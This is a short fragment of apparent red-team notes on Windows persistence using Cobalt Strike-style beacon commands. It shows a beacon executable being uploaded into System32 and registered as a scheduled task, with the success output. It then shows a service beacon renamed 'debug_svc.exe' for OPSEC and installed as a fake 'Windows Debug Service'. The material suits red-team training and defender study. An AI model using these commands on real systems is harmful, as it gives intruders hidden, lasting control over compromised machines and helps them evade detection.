• Scheduled Task

    beacon> cd C:\\Windows\\System32
    beacon> upload C:\\Payloads\\beacon_x64.exe
    beacon> schtaskscreate \\Beacon XML CREATE
    
    createTask hostname: taskpath:\\Beacon mode:2 force:0
    Got user name and security descriptor
    Valitdated task
    Created task path
    Registered task
    SUCCESS.
    
  • Windows Service

    • Create a service after uploading a svc beacon and renaming it as debug_svc.exe (for OPSEC) → beacon> sc_create dbgsvc "Debug Service" C:\\Windows\\System32\\debug_svc.exe "Windows Debug Service" 0 2 3
    • To verify that it was successfully created → sc_qc dbgsvc